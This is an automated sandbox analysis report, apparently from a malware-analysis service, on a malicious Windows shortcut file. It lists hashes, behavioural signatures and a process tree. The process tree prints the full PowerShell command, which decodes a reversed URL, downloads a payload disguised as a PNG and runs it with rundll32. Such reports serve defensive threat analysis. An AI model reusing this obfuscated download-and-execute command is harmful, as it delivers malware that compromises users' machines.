Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
07-07-2022 15:48
Static task
static1
Behavioral task
behavioral1
Sample
doc_2265273.lnk
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
General
-
Target
doc_2265273.lnk
-
Size
2KB
-
MD5
a312e810fd34a9668948d6fa45982d25
-
SHA1
a54e369404b7f2a1bc894116c4f9ee619cefe294
-
SHA256
50518300d02153d04bf8eb8efd784fd88db56fbae142c1cfd5af45a52023d262
-
SHA512
19dd647a3332b11440cce6ef2b129e09f3d280b997d8bc64449f2676f7dec5e8c260c494551a79faebc4b6e9c0bbfc955ea1d37018da013cd84266bcd9335fef
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1500 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 316 wrote to memory of 1500 316 cmd.exe powershell.exe PID 316 wrote to memory of 1500 316 cmd.exe powershell.exe PID 316 wrote to memory of 1500 316 cmd.exe powershell.exe PID 1500 wrote to memory of 1996 1500 powershell.exe rundll32.exe PID 1500 wrote to memory of 1996 1500 powershell.exe rundll32.exe PID 1500 wrote to memory of 1996 1500 powershell.exe rundll32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\doc_2265273.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $s='/g54y5gcm548757vy/evres/dx/us.ssseniram//:ptth'; $r=$s[-1..-($s.Length)] -join ''; iwr -uri $r -o "c:\users\public\default.png";ru"ndll"32 c:\users\public\default.png,`#12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" c:\users\public\default.png #13⤵PID:1996